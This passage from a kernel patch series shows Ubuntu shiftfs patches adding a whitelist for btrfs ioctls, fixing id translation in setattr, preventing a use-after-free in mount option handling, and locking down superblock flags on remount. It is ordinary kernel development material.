+ 	sb->s_op = &shiftfs_super_ops;
+ 	sb->s_xattr = shiftfs_xattr_handlers;
+ 	sb->s_d_op = &shiftfs_dentry_ops;
+-	sb->s_root = d_make_root(shiftfs_new_inode(sb, S_IFDIR, dentry));
++	sb->s_flags |= SB_POSIXACL;
++	sb->s_root = d_make_root(inode);
++	if (!sb->s_root) {
++		err = -ENOMEM;
++		goto out_put_path;
++	}
++
+ 	sb->s_root->d_fsdata = dentry;
++	sbinfo->userns = get_user_ns(dentry->d_sb->s_user_ns);
++	shiftfs_copyattr(dentry->d_inode, sb->s_root->d_inode);
+ 
+-	return 0;
++	dentry = NULL;
++	err = 0;
+ 
+- out_put:
++out_put_path:
+ 	path_put(&path);
+- out:
++
++out_free_name:
+ 	kfree(name);
+-	kfree(ssi);
++
++	dput(dentry);
++
+ 	return err;
+ }
+ 
+@@ -764,17 +1869,26 @@ static struct file_system_type shiftfs_type = {
+ 
+ static int __init shiftfs_init(void)
+ {
++	shiftfs_file_info_cache = kmem_cache_create(
++		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
++		SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
++	if (!shiftfs_file_info_cache)
++		return -ENOMEM;
++
+ 	return register_filesystem(&shiftfs_type);
+ }
+ 
+ static void __exit shiftfs_exit(void)
+ {
+ 	unregister_filesystem(&shiftfs_type);
++	kmem_cache_destroy(shiftfs_file_info_cache);
+ }
+ 
+ MODULE_ALIAS_FS("shiftfs");
+ MODULE_AUTHOR("James Bottomley");
+-MODULE_DESCRIPTION("uid/gid shifting bind filesystem");
++MODULE_AUTHOR("Seth Forshee <seth.forshee@canonical.com>");
++MODULE_AUTHOR("Christian Brauner <christian.brauner@ubuntu.com>");
++MODULE_DESCRIPTION("id shifting filesystem");
+ MODULE_LICENSE("GPL v2");
+ module_init(shiftfs_init)
+ module_exit(shiftfs_exit)
+-- 
+2.39.2
+
+From a2e0843dcd21746dfc23df95ab8c93af942fac6b Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Thu, 4 Apr 2019 15:39:13 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support some btrfs ioctls
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1823186
+
+Shiftfs currently only passes through a few ioctl()s to the underlay. These
+are ioctl()s that are generally considered safe. Doing it for random
+ioctl()s would be a security issue. Permissions for ioctl()s are not
+checked before the filesystem gets involved so if we were to override
+credentials we e.g. could do a btrfs tree search in the underlay which we
+normally wouldn't be allowed to do.
+However, the btrfs filesystem allows unprivileged users to perform various
+operations through its ioctl() interface. With shiftfs these ioctl() are
+currently not working. To not regress users that expect btrfs ioctl()s to
+work in unprivileged containers we can create a whitelist of ioctl()s that
+we allow to go through to the underlay and for which we also switch
+credentials.
+The main problem is how we switch credentials. Since permissions checks for
+ioctl()s are
+done by the actual file system and not by the vfs this would mean that any
+additional capable(<cap>)-based checks done by the filesystem would
+unconditonally pass after we switch credentials. So to make credential
+switching safe we drop *all* capabilities when switching credentials. This
+means that only inode-based permission checks will pass.
+
+Btrfs also allows unprivileged users to delete snapshots when the
+filesystem is mounted with user_subvol_rm_allowed mount option or if the
+the callers is capable(CAP_SYS_ADMIN). The latter should never be the case
+with unprivileged users. To make sure we only allow removal of snapshots in
+the former case we drop all capabilities (see above) when switching
+credentials.
+
+Additonally, btrfs allows the creation of snapshots. To make this work we
+need to be (too) clever. When doing snapshots btrfs requires that an fd to
+the directory the snapshot is supposed to be created in be passed along.
+This fd obviously references a shiftfs file and as such a shiftfs dentry
+and inode.  This will cause btrfs to yell EXDEV. To circumnavigate this
+problem we need to silently temporarily replace the passed in fd with an fd
+that refers to a file that references a btrfs dentry and inode.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 156 +++++++++++++++++++++++++++++++++++++++++++++++++--
+ 1 file changed, 151 insertions(+), 5 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index ad1ae5bce6c1..678cad30f4a5 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1,6 +1,8 @@
++#include <linux/btrfs.h>
+ #include <linux/capability.h>
+ #include <linux/cred.h>
+ #include <linux/mount.h>
++#include <linux/fdtable.h>
+ #include <linux/file.h>
+ #include <linux/fs.h>
+ #include <linux/namei.h>
+@@ -41,7 +43,21 @@ static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
+ 
+ #define SHIFTFS_PASSTHROUGH_NONE 0
+ #define SHIFTFS_PASSTHROUGH_STAT 1
+-#define SHIFTFS_PASSTHROUGH_ALL (SHIFTFS_PASSTHROUGH_STAT)
++#define SHIFTFS_PASSTHROUGH_IOCTL 2
++#define SHIFTFS_PASSTHROUGH_ALL                                                \
++	(SHIFTFS_PASSTHROUGH_STAT | SHIFTFS_PASSTHROUGH_IOCTL)
++
++static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info)
++{
++	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
++		return false;
++
++	if (info->info_mark &&
++	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
++		return false;
++
++	return true;
++}
+ 
+ static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
+ {
+@@ -1345,18 +1361,120 @@ static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred,
+ 	return shiftfs_revert_object_creds(oldcred, newcred);
+ }
+ 
++static inline bool is_btrfs_snap_ioctl(int cmd)
++{
++	if ((cmd == BTRFS_IOC_SNAP_CREATE) || (cmd == BTRFS_IOC_SNAP_CREATE_V2))
++		return true;
++
++	return false;
++}
++
++static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
++					  void __user *arg,
++					  struct btrfs_ioctl_vol_args *v1,
++					  struct btrfs_ioctl_vol_args_v2 *v2)
++{
++	int ret;
++
++	if (!is_btrfs_snap_ioctl(cmd))
++		return 0;
++
++	if (cmd == BTRFS_IOC_SNAP_CREATE)
++		ret = copy_to_user(arg, v1, sizeof(*v1));
++	else
++		ret = copy_to_user(arg, v2, sizeof(*v2));
++
++	fdput(lfd);
++	__close_fd(current->files, fd);
++	kfree(v1);
++	kfree(v2);
++
++	return ret;
++}
++
++static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
++					  struct btrfs_ioctl_vol_args **b1,
++					  struct btrfs_ioctl_vol_args_v2 **b2,
++					  struct fd *lfd,
++					  int *newfd)
++{
++	int oldfd, ret;
++	struct fd src;
++	struct btrfs_ioctl_vol_args *v1 = NULL;
++	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
++
++	if (!is_btrfs_snap_ioctl(cmd))
++		return 0;
++
++	if (cmd == BTRFS_IOC_SNAP_CREATE) {
++		v1 = memdup_user(arg, sizeof(*v1));
++		if (IS_ERR(v1))
++			return PTR_ERR(v1);
++		oldfd = v1->fd;
++		*b1 = v1;
++	} else {
++		v2 = memdup_user(arg, sizeof(*v2));
++		if (IS_ERR(v2))
++			return PTR_ERR(v2);
++		oldfd = v2->fd;
++		*b2 = v2;
++	}
++
++	src = fdget(oldfd);
++	if (!src.file)
++		return -EINVAL;
++
++	ret = shiftfs_real_fdget(src.file, lfd);
++	fdput(src);
++	if (ret)
++		return ret;
++
++	*newfd = get_unused_fd_flags(lfd->file->f_flags);
++	if (*newfd < 0) {
++		fdput(*lfd);
++		return *newfd;
++	}
++
++	fd_install(*newfd, lfd->file);
++
++	if (cmd == BTRFS_IOC_SNAP_CREATE) {
++		v1->fd = *newfd;
++		ret = copy_to_user(arg, v1, sizeof(*v1));
++		v1->fd = oldfd;
++	} else {
++		v2->fd = *newfd;
++		ret = copy_to_user(arg, v2, sizeof(*v2));
++		v2->fd = oldfd;
++	}
++
++	if (ret)
++		shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
++
++	return ret;
++}
++
+ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 			       unsigned long arg)
+ {
+-	long ret = 0;
+ 	struct fd lowerfd;
+ 	struct cred *newcred;
+ 	const struct cred *oldcred;
++	int newfd = -EBADF;
++	long err = 0, ret = 0;
++	void __user *argp = (void __user *)arg;
++	struct fd btrfs_lfd = {};
+ 	struct super_block *sb = file->f_path.dentry->d_sb;
++	struct btrfs_ioctl_vol_args *btrfs_v1 = NULL;
++	struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL;
++
++	ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2,
++					     &btrfs_lfd, &newfd);
++	if (ret < 0)
++		return ret;
+ 
+ 	ret = shiftfs_real_fdget(file, &lowerfd);
+ 	if (ret)
+-		return ret;
++		goto out_restore;
+ 
+ 	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
+ 	if (ret)
+@@ -1372,9 +1490,33 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ out_fdput:
+ 	fdput(lowerfd);
+ 
++out_restore:
++	err = shiftfs_btrfs_ioctl_fd_restore(cmd, btrfs_lfd, newfd, argp,
++					     btrfs_v1, btrfs_v2);
++	if (!ret)
++		ret = err;
++
+ 	return ret;
+ }
+ 
++static bool in_ioctl_whitelist(int flag)
++{
++	switch (flag) {
++	case BTRFS_IOC_SNAP_CREATE:
++		return true;
++	case BTRFS_IOC_SNAP_CREATE_V2:
++		return true;
++	case BTRFS_IOC_SUBVOL_CREATE:
++		return true;
++	case BTRFS_IOC_SUBVOL_CREATE_V2:
++		return true;
++	case BTRFS_IOC_SNAP_DESTROY:
++		return true;
++	}
++
++	return false;
++}
++
+ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
+ 			  unsigned long arg)
+ {
+@@ -1386,7 +1528,9 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
+ 	case FS_IOC_SETFLAGS:
+ 		break;
+ 	default:
+-		return -ENOTTY;
++		if (!in_ioctl_whitelist(cmd) ||
++		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
++			return -ENOTTY;
+ 	}
+ 
+ 	return shiftfs_real_ioctl(file, cmd, arg);
+@@ -1403,7 +1547,9 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
+ 	case FS_IOC32_SETFLAGS:
+ 		break;
+ 	default:
+-		return -ENOIOCTLCMD;
++		if (!in_ioctl_whitelist(cmd) ||
++		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
++			return -ENOIOCTLCMD;
+ 	}
+ 
+ 	return shiftfs_real_ioctl(file, cmd, arg);
+-- 
+2.39.2
+
+From 7e64c9484f2524943cde1164852c1888312c010f Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Thu, 11 Apr 2019 07:31:04 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: use translated ids when chaning lower
+ fs attrs
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1824350
+
+shiftfs_setattr() is preparing a new set of attributes with the
+owner translated for the lower fs, but it then passes the
+original attrs. As a result the owner is set to the untranslated
+owner, which causes the shiftfs inodes to also have incorrect
+ids. For example:
+
+ # mkdir dir
+ # touch file
+ # ls -lh dir file
+ drwxr-xr-x 2 root root 4.0K Apr 11 13:05 dir
+ -rw-r--r-- 1 root root 0 Apr 11 13:05 file
+ # chown 500:500 dir file
+ # ls -lh dir file
+ drwxr-xr-x 2 1000500 1000500 4.0K Apr 11 12:42 dir
+ -rw-r--r-- 1 1000500 1000500 0 Apr 11 12:42 file
+
+Fix this to pass the correct iattr struct to notify_change().
+
+Reviewed-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 678cad30f4a5..e736fd6afcb4 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -779,7 +779,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 
+ 	inode_lock(loweri);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = notify_change(lowerd, attr, NULL);
++	err = notify_change(lowerd, &newattr, NULL);
+ 	revert_creds(oldcred);
+ 	inode_unlock(loweri);
+ 
+-- 
+2.39.2
+
+From 84e09374dce45b2aaec7e719acd209b1e5e4ae85 Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Sat, 13 Apr 2019 14:41:01 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix passing of attrs to underaly for
+ setattr
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1824717
+
+shiftfs_setattr() makes a copy of the attrs it was passed to pass
+to the lower fs. It then calls setattr_prepare() with the original
+attrs, and this may make changes which are not reflected in the
+attrs passed to the lower fs. To fix this, copy the attrs to the
+new struct for the lower fs after calling setattr_prepare().
+
+Additionally, notify_change() may have set ATTR_MODE when one of
+ATTR_KILL_S[UG]ID is set, and passing this combination to
+notify_change() will trigger a BUG(). Do as overlayfs and
+ecryptfs both do, and clear ATTR_MODE if either of those bits
+is set.
+
+Reviewed-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Marcelo Henrique Cerri <marcelo.cerri@canonical.com>
+Acked-by: Brad Figg <brad.figg@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index e736fd6afcb4..8e064756ea0c 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -765,7 +765,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ {
+ 	struct dentry *lowerd = dentry->d_fsdata;
+ 	struct inode *loweri = lowerd->d_inode;
+-	struct iattr newattr = *attr;
++	struct iattr newattr;
+ 	const struct cred *oldcred;
+ 	struct super_block *sb = dentry->d_sb;
+ 	int err;
+@@ -774,9 +774,17 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 	if (err)
+ 		return err;
+ 
++	newattr = *attr;
+ 	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
+ 	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
+ 
++	/*
++	 * mode change is for clearing setuid/setgid bits. Allow lower fs
++	 * to interpret this in its own way.
++	 */
++	if (newattr.ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID))
++		newattr.ia_valid &= ~ATTR_MODE;
++
+ 	inode_lock(loweri);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+ 	err = notify_change(lowerd, &newattr, NULL);
+-- 
+2.39.2
+
+From a3ba10b3019139566fa65c351966ca3482c90819 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Mon, 15 Apr 2019 15:21:55 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent use-after-free when verifying
+ mount options
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1824735
+
+Copy up the passthrough mount settings of the mark mount point to the
+shiftfs overlay.
+
+Before this commit we used to keep a reference to the shiftfs mark
+mount's shiftfs_super_info which was stashed in the superblock of the
+mark mount. The problem is that we only take a reference to the mount of
+the underlay, i.e. the filesystem that is *under* the shiftfs mark
+mount. This means when someone performs a shiftfs mark mount, then a
+shiftfs overlay mount and then immediately unmounts the shiftfs mark
+mount we muck with invalid memory since shiftfs_put_super might have
+already been called freeing that memory.
+
+Another solution would be to start reference counting. But this would be
+overkill. We only care about the passthrough mount option of the mark
+mount. And we only need it to verify that on remount the new passthrough
+options of the shiftfs overlay are a subset of the mark mount's
+passthrough options. In other scenarios we don't care. So copying up is
+good enough and also only needs to happen once on mount, i.e. when a new
+superblock is created and the .fill_super method is called.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 29 ++++++++++++++++++-----------
+ 1 file changed, 18 insertions(+), 11 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 8e064756ea0c..4c8a6ec2a617 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -28,7 +28,7 @@ struct shiftfs_super_info {
+ 	const struct cred *creator_cred;
+ 	bool mark;
+ 	unsigned int passthrough;
+-	struct shiftfs_super_info *info_mark;
++	unsigned int passthrough_mark;
+ };
+ 
+ struct shiftfs_file_info {
+@@ -52,10 +52,6 @@ static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info)
+ 	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
+ 		return false;
+ 
+-	if (info->info_mark &&
+-	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
+-		return false;
+-
+ 	return true;
+ }
+ 
+@@ -64,10 +60,6 @@ static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
+ 	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT))
+ 		return false;
+ 
+-	if (info->info_mark &&
+-	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_STAT))
+-		return false;
+-
+ 	return true;
+ }
+ 
+@@ -1824,7 +1816,7 @@ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
+ 
+ 	if (info->passthrough != new.passthrough) {
+ 		/* Don't allow exceeding passthrough options of mark mount. */
+-		if (!passthrough_is_subset(info->info_mark->passthrough,
++		if (!passthrough_is_subset(info->passthrough_mark,
+ 					   info->passthrough))
+ 			return -EPERM;
+ 
+@@ -1926,9 +1918,19 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 
+ 			sbinfo->mnt = mntget(sbinfo_mp->mnt);
+ 			dentry = dget(path.dentry->d_fsdata);
++			/*
++			 * Copy up the passthrough mount options from the
++			 * parent mark mountpoint.
++			 */
++			sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark;
+ 		} else {
+ 			sbinfo->mnt = mntget(path.mnt);
+ 			dentry = dget(path.dentry);
++			/*
++			 * For a new mark passthrough_mark and passthrough
++			 * are identical.
++			 */
++			sbinfo->passthrough_mark = sbinfo->passthrough;
+ 		}
+ 
+ 		sbinfo->creator_cred = prepare_creds();
+@@ -1956,7 +1958,12 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		sbinfo->mnt = mntget(sbinfo_mp->mnt);
+ 		sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
+ 		dentry = dget(path.dentry->d_fsdata);
+-		sbinfo->info_mark = sbinfo_mp;
++		/*
++		 * Copy up passthrough settings from mark mountpoint so we can
++		 * verify when the overlay wants to remount with different
++		 * passthrough settings.
++		 */
++		sbinfo->passthrough_mark = sbinfo_mp->passthrough;
+ 	}
+ 
+ 	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
+-- 
+2.39.2
+
+From a6ec1bf679d71f552f3eee7bf2b5458a6ea71e9a Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Tue, 16 Apr 2019 18:29:00 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: use separate llseek method for
+ directories
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1824812
+
+Give shiftfs it's own proper llseek method for directories.
+
+Before this commit we used to rely on an llseek method that was
+targeted for regular files for both directories and regular files.
+However, the realfile's f_pos was not correctly handled when userspace
+called lseek(2) on a shiftfs directory file. Give directories their
+own llseek operation so that seeking on a directory file is properly
+supported.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 14 +++++++++++---
+ 1 file changed, 11 insertions(+), 3 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 4c8a6ec2a617..9771165d1ce0 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1144,7 +1144,15 @@ static int shiftfs_release(struct inode *inode, struct file *file)
+ 	return 0;
+ }
+ 
+-static loff_t shiftfs_llseek(struct file *file, loff_t offset, int whence)
++static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence)
++{
++	struct shiftfs_file_info *file_info = file->private_data;
++	struct file *realfile = file_info->realfile;
++
++	return vfs_llseek(realfile, offset, whence);
++}
++
++static loff_t shiftfs_file_llseek(struct file *file, loff_t offset, int whence)
+ {
+ 	struct inode *realinode = file_inode(file)->i_private;
+ 
+@@ -1653,7 +1661,7 @@ static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
+ const struct file_operations shiftfs_file_operations = {
+ 	.open			= shiftfs_open,
+ 	.release		= shiftfs_release,
+-	.llseek			= shiftfs_llseek,
++	.llseek			= shiftfs_file_llseek,
+ 	.read_iter		= shiftfs_read_iter,
+ 	.write_iter		= shiftfs_write_iter,
+ 	.fsync			= shiftfs_fsync,
+@@ -1670,7 +1678,7 @@ const struct file_operations shiftfs_dir_operations = {
+ 	.compat_ioctl		= shiftfs_compat_ioctl,
+ 	.fsync			= shiftfs_fsync,
+ 	.iterate_shared		= shiftfs_iterate_shared,
+-	.llseek			= shiftfs_llseek,
++	.llseek			= shiftfs_dir_llseek,
+ 	.open			= shiftfs_open,
+ 	.read			= generic_read_dir,
+ 	.release		= shiftfs_release,
+-- 
+2.39.2
+
+From 10c6312a5c1cd2fbbbcb47adf7597e8cb2e18391 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Wed, 8 May 2019 14:13:14 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: lock down certain superblock flags
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1827122
+
+This locks down various superblock flags to prevent userns-root from
+remounting a superblock with less restrictive options than the original
+mark or underlay mount.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 47 ++++++++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 46 insertions(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 9771165d1ce0..a1dae7ea593b 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1808,6 +1808,33 @@ static inline bool passthrough_is_subset(int old_flags, int new_flags)
+ 	return true;
+ }
+ 
++static int shiftfs_super_check_flags(unsigned long old_flags,
++				     unsigned long new_flags)
++{
++	if ((old_flags & SB_RDONLY) && !(new_flags & SB_RDONLY))
++		return -EPERM;
++
++	if ((old_flags & SB_NOSUID) && !(new_flags & SB_NOSUID))
++		return -EPERM;
++
++	if ((old_flags & SB_NODEV) && !(new_flags & SB_NODEV))
++		return -EPERM;
++
++	if ((old_flags & SB_NOEXEC) && !(new_flags & SB_NOEXEC))
++		return -EPERM;
++
++	if ((old_flags & SB_NOATIME) && !(new_flags & SB_NOATIME))
++		return -EPERM;
++
++	if ((old_flags & SB_NODIRATIME) && !(new_flags & SB_NODIRATIME))
++		return -EPERM;
++
++	if (!(old_flags & SB_POSIXACL) && (new_flags & SB_POSIXACL))
++		return -EPERM;
++
++	return 0;
++}
++
+ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
+ {
+ 	int err;
+@@ -1818,6 +1845,10 @@ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
+ 	if (err)
+ 		return err;
+ 
++	err = shiftfs_super_check_flags(sb->s_flags, *flags);
++	if (err)
++		return err;
++
+ 	/* Mark mount option cannot be changed. */
+ 	if (info->mark || (info->mark != new.mark))
+ 		return -EPERM;
+@@ -1847,6 +1878,16 @@ struct shiftfs_data {
+ 	const char *path;
+ };
+ 
++static void shiftfs_super_force_flags(struct super_block *sb,
++				      unsigned long lower_flags)
++{
++	sb->s_flags |= lower_flags & (SB_RDONLY | SB_NOSUID | SB_NODEV |
++				      SB_NOEXEC | SB_NOATIME | SB_NODIRATIME);
++
++	if (!(lower_flags & SB_POSIXACL))
++		sb->s_flags &= ~SB_POSIXACL;
++}
++
+ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 			      int silent)
+ {
+@@ -1888,6 +1929,8 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		goto out_put_path;
+ 	}
+ 
++	sb->s_flags |= SB_POSIXACL;
++
+ 	if (sbinfo->mark) {
+ 		struct super_block *lower_sb = path.mnt->mnt_sb;
+ 
+@@ -1904,6 +1947,8 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		 */
+ 		sb->s_iflags = SB_I_NOEXEC;
+ 
++		shiftfs_super_force_flags(sb, lower_sb->s_flags);
++
+ 		/*
+ 		 * Handle nesting of shiftfs mounts by referring this mark
+ 		 * mount back to the original mark mount. This is more
+@@ -1972,6 +2017,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		 * passthrough settings.
+ 		 */
+ 		sbinfo->passthrough_mark = sbinfo_mp->passthrough;
++		shiftfs_super_force_flags(sb, path.mnt->mnt_sb->s_flags);
+ 	}
+ 
+ 	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
+@@ -1995,7 +2041,6 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 	sb->s_op = &shiftfs_super_ops;
+ 	sb->s_xattr = shiftfs_xattr_handlers;
+ 	sb->s_d_op = &shiftfs_dentry_ops;
+-	sb->s_flags |= SB_POSIXACL;
+ 	sb->s_root = d_make_root(inode);
+ 	if (!sb->s_root) {
+ 		err = -ENOMEM;
+-- 
+2.39.2
+
+From 650ec55632c03c03e6cc5b08a764609b4b0eb192 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Tue, 11 Jun 2019 11:47:35 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: allow changing ro/rw for subvolumes
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1832316
+
+This enables toggling between ro/rw for btrfs subvolumes under shiftfs.
+
+Currently, btrfs workloads employing shiftfs cause regression.
+With btrfs unprivileged users can already toggle whether a subvolume
+will be ro or rw. This is broken on current shiftfs as we haven't
+whitelisted these ioctls().
+To prevent such regression, we need to whitelist the ioctls
+BTRFS_IOC_FS_INFO, BTRFS_IOC_SUBVOL_GETFLAGS, and
+BTRFS_IOC_SUBVOL_SETFLAGS. All of them should be safe for unprivileged
+users.
+
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Cc: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 21 ++++++++++++++++++---
+ 1 file changed, 18 insertions(+), 3 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index a1dae7ea593b..49f6714e9f95 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1507,9 +1507,14 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 	return ret;
+ }
+ 
+-static bool in_ioctl_whitelist(int flag)
++static bool in_ioctl_whitelist(int flag, unsigned long arg)
+ {
++	void __user *argp = (void __user *)arg;
++	u64 flags = 0;
++
+ 	switch (flag) {
++	case BTRFS_IOC_FS_INFO:
++		return true;
+ 	case BTRFS_IOC_SNAP_CREATE:
+ 		return true;
+ 	case BTRFS_IOC_SNAP_CREATE_V2:
+@@ -1517,6 +1522,16 @@ static bool in_ioctl_whitelist(int flag)
+ 	case BTRFS_IOC_SUBVOL_CREATE:
+ 		return true;
+ 	case BTRFS_IOC_SUBVOL_CREATE_V2:
++		return true;
++	case BTRFS_IOC_SUBVOL_GETFLAGS:
++		return true;
++	case BTRFS_IOC_SUBVOL_SETFLAGS:
++		if (copy_from_user(&flags, arg, sizeof(flags)))
++			return false;
++
++		if (flags & ~BTRFS_SUBVOL_RDONLY)
++			return false;
++
+ 		return true;
+ 	case BTRFS_IOC_SNAP_DESTROY:
+ 		return true;
+@@ -1536,7 +1551,7 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
+ 	case FS_IOC_SETFLAGS:
+ 		break;
